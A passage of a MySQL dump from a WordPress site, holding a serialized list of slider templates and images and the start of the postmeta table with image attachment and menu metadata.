2\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide3.jpg\";}}s:25:\"black-friday-scroll-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"black-friday-scroll-video/slide1.jpg\";}}s:12:\"charity-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"charity-menu/slide1.jpg\";}}s:14:\"charity-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"charity-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"charity-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"charity-header/slide3.jpg\";}}s:15:\"charity-mission\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-mission/slide1.jpg\";}}s:13:\"charity-funds\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"charity-funds/slide1.jpg\";}}s:15:\"charity-success\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-success/slide1.jpg\";}}s:15:\"charity-stories\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-stories/slide1.jpg\";}}s:16:\"charity-worldmap\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"charity-worldmap/slide1.jpg\";}}s:19:\"charity-large-image\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"charity-large-image/slide1.jpg\";}}s:16:\"charity-sponsors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"charity-sponsors/slide1.jpg\";}}s:12:\"charity-help\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"charity-help/slide1.jpg\";}}s:14:\"charity-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"charity-footer/slide1.jpg\";}}s:21:\"cinematic-hero-titles\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide3.jpg\";}}s:23:\"design-dna-scroll-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"design-dna-scroll-video/slide1.jpg\";}}s:27:\"food-delivery-lottie-scroll\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"food-delivery-lottie-scroll/slide1.jpg\";}}s:20:\"food-recipe-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"food-recipe-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"food-recipe-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"food-recipe-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"food-recipe-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"food-recipe-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"food-recipe-carousel/slide6.jpg\";}}s:17:\"food-recipe-modal\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"food-recipe-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"food-recipe-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"food-recipe-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"food-recipe-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"food-recipe-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"food-recipe-modal/slide6.jpg\";}}s:27:\"corporate-carousel-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"packages/corporate_carousel_bundle.jpg\";}}s:18:\"corporate-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"corporate-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"corporate-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"corporate-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"corporate-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"corporate-carousel/slide5.jpg\";}}s:18:\"corporate-lightbox\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"corporate-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"corporate-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"corporate-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"corporate-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"corporate-lightbox/slide5.jpg\";}}s:23:\"cyber-carousel-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"packages/cybercarousel_bundle.jpg\";}}s:14:\"cyber-carousel\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"cyber-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"cyber-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"cyber-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"cyber-carousel/slide4.jpg\";}}s:23:\"cyber-carousel-lightbox\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide4.jpg\";}}s:24:\"woocommerce-carousel-one\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"woocommerce-carousel-one/slide1.jpg\";}}s:31:\"woocommerce-carousel-one-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide6.jpg\";}}s:24:\"woocommerce-carousel-two\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"woocommerce-carousel-two/slide1.jpg\";}}s:31:\"woocommerce-carousel-two-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide6.jpg\";}}s:26:\"woocommerce-feature-slider\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"woocommerce-feature-slider/slide1.jpg\";}}s:33:\"woocommerce-feature-slider-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide6.jpg\";}}s:17:\"woo-liquid-slider\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"woo-liquid-slider/slide1.jpg\";}}s:32:\"woocommerce-liquid-slider-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide6.jpg\";}}s:15:\"woo-slider-pack\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"packages/woosliderpack_dynamic.jpg\";}}s:22:\"woo-slider-pack-static\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"packages/woosliderpack_static.jpg\";}}s:24:\"creative-hero-collection\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"creative-hero-collection/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"creative-hero-collection/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"creative-hero-collection/slide3.jpg\";}}s:19:\"photographer-slider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"photographer-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"photographer-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"photographer-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"photographer-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:30:\"photographer-slider/slide5.jpg\";}}s:17:\"realestate-slider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"realestate-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"realestate-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"realestate-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"realestate-slider/slide4.jpg\";}}s:19:\"saas-product-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"saas-product-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"saas-product-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"saas-product-slider/slide3.jpg\";}}s:27:\"cinematic-wildlife-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"packages/cinematic-wildlife-package.jpg\";}}s:25:\"cinematic-wildlife-slider\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide7.jpg\";}}s:24:\"cinematic-wildlife-modal\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide7.jpg\";}}}}','no');
/*!40000 ALTER TABLE `wpii_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_postmeta`
--

DROP TABLE IF EXISTS `wpii_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=1708 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_postmeta`
--

LOCK TABLES `wpii_postmeta` WRITE;
/*!40000 ALTER TABLE `wpii_postmeta` DISABLE KEYS */;
INSERT INTO `wpii_postmeta` VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'),(3,5,'_wp_attached_file','2020/10/2020-landscape-1.png'),(4,5,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:769;s:4:\"file\";s:28:\"2020/10/2020-landscape-1.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"2020-landscape-1-300x192.png\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"2020-landscape-1-1024x656.png\";s:5:\"width\";i:1024;s:6:\"height\";i:656;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"2020-landscape-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"2020-landscape-1-768x492.png\";s:5:\"width\";i:768;s:6:\"height\";i:492;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5,5,'_starter_content_theme','twentytwenty'),(39,22,'_menu_item_target',''),(7,6,'_thumbnail_id','5'),(38,22,'_menu_item_object','custom'),(9,6,'_customize_changeset_uuid','80e97f57-9f35-47c1-ad3e-2ff11b0d512b'),(37,22,'_menu_item_object_id','22'),(11,7,'_customize_changeset_uuid','80e97f57-9f35-47c1-ad3e-2ff11b0d512b'),(36,22,'_menu_item_menu_item_parent','0'),(13,8,'_customize_changeset_uuid','80e97f57-9f35-47c1-ad3e-2ff11b0d512b'),(35,22,'_menu_item_type','custom'),(15,9,'_customize_changeset_uuid','80e97f57-9f35-47c1-ad3e-2ff11b0d512b'),(16,11,'_wp_attached_file','2020/10/HPS_Color_Black-Text.png.png'),(17,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:144;s:4:\"file\";s:36:\"2020/10/HPS_Color_Black-Text.png.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"HPS_Color_Black-Text.png-150x144.png\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18,12,'_wp_attached_file','2020/10/cropped-HPS_Color_Black-Text.png.png'),(19,12,'_wp_attachment_context','custom-logo'),(20,12,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:144;s:4:\"file\";s:44:\"2020/10/cropped-HPS_Color_Black-Text.png.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"cropped-HPS_Color_Black-Text.png-150x144.png\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21,13,'_wp_attached_file','2020/10/Flame-Color.png'),(22,13,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:144;s:4:\"file\";s:23:\"2020/10/Flame-Color.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23,14,'_wp_attached_file','2020/10/cropped-Flame-Color.png'),(24,14,'_wp_attachment_context','site-icon'),(25,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:31:\"2020/10/cropped-Flame-Color.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:29:\"cropped-Flame-Color-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26,15,'_wp_attached_file','2020/10/Flame-BW.png'),(27,15,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:144;s:4:\"file\";s:20:\"2020/10/Flame-BW.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(28,16,'_wp_attached_file','2020/10/cropped-Flame-BW.png'),(29,16,'_wp_attachment_context','site-icon'),(30,16,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2020/10/cropped-Flame-BW.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-Flame-BW-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-Flame-BW-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:28:\"cropped-Flame-BW-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:28:\"cropped-Flame-BW-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:28:\"cropped-Flame-BW-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:26:\"cropped-Flame-BW-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31,17,'_wp_attached_file','2020/10/cropped-Flame-Color-1.png'),(32,17,'_wp_attachment_context','site-icon'),(33,17,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:33:\"2020/10/cropped-Flame-Color-1.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cropped-Flame-Color-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-Flame-Color-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:33:\"cropped-Flame-Color-1-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:33:\"cropped-Flame-Color-1-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:33:\"cropped-Flame-Color-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:31:\"cropped-Flame-Color-1-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(40,22,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(